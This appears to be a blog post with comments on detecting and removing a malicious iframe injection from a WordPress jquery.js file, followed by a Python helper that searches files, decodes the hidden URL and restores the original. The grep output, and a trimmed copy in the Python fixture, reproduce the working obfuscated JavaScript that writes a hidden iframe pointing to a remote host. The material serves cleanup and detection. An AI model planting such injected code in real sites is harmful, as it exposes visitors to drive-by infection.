Finding & Removing malicious iframe exploit from WordPress

Some time back, one of our under-construction sites was infected with an iframe injection in its WordPress theme. As it was not a live site, I didn’t care much. Today, my friend Federico’s company site, Helios Design, was infected with the same exploit.

First… About the iframe exploit!

This exploit injected malicious code into WordPress’s “wp-includes/js/jquery/jquery.js” file, highlighted in the following screenshot.

Iframe injection in jquery.js - WordPress Security Issue-1

When compared with the original WordPress file (http://svn.automattic.com/wordpress/tags/2.8.4/wp-includes/js/jquery/jquery.js), you can see that extra code was added at the top.

As a result, at runtime an iframe is created that loads a remote script. It also broke the site’s markup, resulting in bad SEO and failed validation. Such exploits can serve as a foothold for bigger attacks or may infect visitors’ computers.

If Google crawls your site while such code is present, your site may get flagged and blocked in browsers like Firefox, Chrome and Safari. In that case, visitors get a big security alert when they attempt to visit your site.

How-To fix this…

Find the exact code that was inserted. In my friend’s case, the following code was injected:

iframe codes in theme-2

Now, searching for the “src” link won’t be a good idea. Whoever can inject the above code into WordPress (most probably via third-party code) will not store its src URL in plain text. Also, rather than searching for the complete code, it’s better to search for different parts of it separately.

In this case, I decided to search for “uKUwc”, “xblacnknet.cn” and “kDaxV” separately.

As far as searching is concerned, there are two places to search: the database and the filesystem.

For the database search you can use phpMyAdmin. If you don’t have phpMyAdmin, just install the WP-phpMyAdmin plugin.

To search the filesystem, open a shell on your server and execute a grep command like the one below:

grep -H -r "kDaxV" /path/to/wp-root-dir

Substitute “/path/to/wp-root-dir” with the filesystem path of the directory where WordPress is installed. “kDaxV” is the search string; try different search strings until you get a result. “-r” makes grep search recursively and “-H” makes it print filenames. The above command searches inside file contents.

For more details on this command, refer to this article by Vivek Gite.

Executing the above command produced the following output:

./wp-includes/js/jquery/jquery.js:var/**/YFiXz/**/=/**/document;function/**/ugGMs(czlmZ){/**/var/**/cZdbo/**/=/**/””,/**/aujtC/**/=/**/0;for/**/(aujtC=czlmZ.length-1;aujtC>=0;aujtC–){cZdbo/**/+=/**/czlmZ.charAt(aujtC);}/**/return/**/cZdbo;}function/**/xHiRm(UbqcV){UbqcV/**/=/**/UbqcV.replace(/[.]/g,/**/”%”);UbqcV/**/=/**/unescape(UbqcV);return/**/ugGMs(UbqcV);}function/**/WDxZS(){document.write(“<style>.kDaxV{width:0%;height:0%;border:none;}</style>”);var/**/KJKbL/**/=/**/”<iframe/**/name=”3″ id=”uKUwc” src=”$” class=”kDaxV”></iframe>”;var/**/Xqvgy/**/=/**/KJKbL.replace(/[+$]/g,/**/xHiRm(“.69.67.63.2e.76.2f.76.2f.6e.69.62.2d.69.67.63.2f.6e.63.2e.74.65.6e.6b.63.61.6c.62.78.2f.2f.3a.70.74.74.68”));return/**/Xqvgy;}YFiXz.writeln(WDxZS());

Once you find the exact file, you can either remove the malicious code from it or replace the file with the original version from the WordPress repository.
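A triage helper for the steps above, added here as an example; it is not code from the post or from WordPress. It walks a WordPress root the way “grep -H -r” does, decodes the dot-separated hex string seen in the grep output above exactly as the payload’s own xHiRm()/ugGMs() pair does (replace dots with %, unescape, reverse) so you can see the URL the iframe would have loaded, and compares the live jquery.js against a pristine copy by SHA-256 so the “replace with the original” step can be verified. The directory layout, the stand-in jquery.js contents and the pristine-copy path are constructed for the demo; the injected line is the page’s own payload, lightly trimmed.

```python
import hashlib
import os
import re
import shutil
import tempfile

# Search strings from the post plus the generic fingerprint of this obfuscator:
# empty comments (/**/) used in place of whitespace to dodge naive matching.
NEEDLES = ("kDaxV", "uKUwc", "/**/document", "unescape(")

# A double-quoted run of dot-separated hex pairs: the shape the hidden URL takes.
HEX_DOTS = re.compile(r'"((?:\.[0-9A-Fa-f]{2}){8,})"')

# Recognisable parts of the injected line from the grep output above, lightly
# trimmed (iframe attribute quoting simplified). Used only as a test fixture.
INJECTED_LINE = (
    'var/**/YFiXz/**/=/**/document;'
    'function/**/xHiRm(UbqcV){UbqcV/**/=/**/UbqcV.replace(/[.]/g,/**/"%");'
    'UbqcV/**/=/**/unescape(UbqcV);return/**/ugGMs(UbqcV);}'
    'var/**/KJKbL/**/=/**/"<iframe id=uKUwc src=$ class=kDaxV></iframe>";'
    'var/**/Xqvgy/**/=/**/KJKbL.replace(/[+$]/g,/**/xHiRm('
    '".69.67.63.2e.76.2f.76.2f.6e.69.62.2d.69.67.63.2f.6e.63.2e.74.65.6e.6b'
    '.63.61.6c.62.78.2f.2f.3a.70.74.74.68"));'
)

def js_unescape(text):
    """Minimal JavaScript unescape(): %XX -> the corresponding character."""
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)

def decode_hidden_url(encoded):
    """Mirror of the payload's xHiRm() then ugGMs(): '.' -> '%', unescape, reverse."""
    return js_unescape(encoded.replace(".", "%"))[::-1]

def extract_hidden_urls(js_source):
    """Decode every dot-hex string literal found in a JavaScript source."""
    return [decode_hidden_url(m) for m in HEX_DOTS.findall(js_source)]

def search_tree(root, needles=NEEDLES):
    """grep -H -r equivalent: {relative path: [(line number, line)]}."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for number, line in enumerate(fh, 1):
                    if any(needle in line for needle in needles):
                        rel = os.path.relpath(path, root).replace(os.sep, "/")
                        hits.setdefault(rel, []).append((number, line.rstrip("\n")))
    return hits

def modified_vs_pristine(path, pristine_path):
    """True when the live file's SHA-256 no longer matches the known-good copy."""
    digests = []
    for p in (path, pristine_path):
        with open(p, "rb") as fh:
            digests.append(hashlib.sha256(fh.read()).hexdigest())
    return digests[0] != digests[1]

def restore_from_pristine(path, pristine_path):
    """The post's fix: put the original file back. Returns True if it now matches."""
    shutil.copyfile(pristine_path, path)
    return not modified_vs_pristine(path, pristine_path)

def triage(root, pristine_path, target="wp-includes/js/jquery/jquery.js"):
    """One pass: find hits, decode what they hide, check the target against pristine."""
    hits = search_tree(root)
    urls = []
    for rel in hits:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            urls.extend(extract_hidden_urls(fh.read()))
    return {"hits": hits, "hidden_urls": urls,
            "modified": modified_vs_pristine(os.path.join(root, target), pristine_path)}

def build_sample_tree():
    """Constructed fixture (not a real install): a tiny WordPress root whose jquery.js
    has INJECTED_LINE prepended, plus a pristine copy kept outside the root."""
    base = tempfile.mkdtemp(prefix="wp-iframe-demo-")
    root = os.path.join(base, "wordpress")
    js_dir = os.path.join(root, "wp-includes", "js", "jquery")
    os.makedirs(js_dir)
    original = "/* stand-in for the real jquery.js */\n(function(){})();\n"
    pristine = os.path.join(base, "jquery.pristine.js")
    with open(pristine, "w") as fh:
        fh.write(original)
    with open(os.path.join(js_dir, "jquery.js"), "w") as fh:
        fh.write(INJECTED_LINE + "\n" + original)
    return root, pristine

if __name__ == "__main__":
    root, pristine = build_sample_tree()
    report = triage(root, pristine)
    for rel, lines in report["hits"].items():
        print(f"{rel}:{lines[0][0]}: {lines[0][1][:60]}...")
    print("hidden URLs:", report["hidden_urls"], "| modified:", report["modified"])
    live = os.path.join(root, "wp-includes", "js", "jquery", "jquery.js")
    print("restored:", restore_from_pristine(live, pristine))
```

On a real clean-up, point triage() at the actual install and at a jquery.js downloaded from the SVN tag linked above instead of the constructed fixture. Re-running it after the restore should give no hits and “modified: False”; if the file goes back to mismatching on its own later, something on the server is rewriting it and the clean-up has not removed the entry point.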

Hope this helps someone out there! 🙂

8 Comments

Federico Moreno December 8, 2009

That saved my day and definitely more. Very useful information Rahul 🙂

Arjun S Kumar December 8, 2009

I think OrkutBuddy was infected the same way. It could have been known then, before we moved to some other script..

🙁

de Paulus December 8, 2009

Thanks for this useful info, but do you know HOW this is injected into a page, and how to prevent it?

Rahul Bansal December 8, 2009

@Federico
Glad to see a comment from one of the best designers out there! 😉

@Arjun
If for that reason you moved away from WordPress, then I really feel bad for not giving enough time to OrkutBuddy.

@de Paulus
It’s hard to determine HOW this entered the system.
Had it happened on a site that I’m monitoring in my daily routine, I could have checked server logs and a few more things.
In this particular case, I am not sure WHEN this happened.

Still, I think it must be a hole in a WordPress plugin, as I trust WordPress core, and Federico, being a designer himself, creates his own WordPress themes.

de Paulus December 8, 2009

The reason I asked is because last year ix web hosting had a big issue with “Server Side” security issues, and EVERY page hosted on certain servers got injected with this IFrame, and it happened EVERY 10 days.. this went on for almost 10 months.. Also at the same time, the .htaccess file was re-written to divert traffic to a bogus anti-virus site.. and because it was “Server Side” there was NOTHING the user could do, except re-upping the files every 10 days.. There is a website about this, can’t remember the address, but if you google IX Webhost Warning you will find it.

I agree that Federico is one of the Best Template Designers, I follow him on Theme Forest, and luv his Templates.

Tech-Freak Stuff December 31, 2009

There have been other problems like encrypted code in WordPress themes too. They can also cause severe problems.

Ankit Puri March 18, 2010

Thank you for the trick.

Elisabetta January 9, 2012

I am having exactly the same issue with my website at the moment. The problem is that I have been cleaning the site over and over and within about a day it gets infected again.

Every time I clean the site I get confirmation by my hosting provider that my site is clean, but after a while the iFrame trojan raises its ugly head again.

So besides cleaning, is there a way to prevent this from recurring?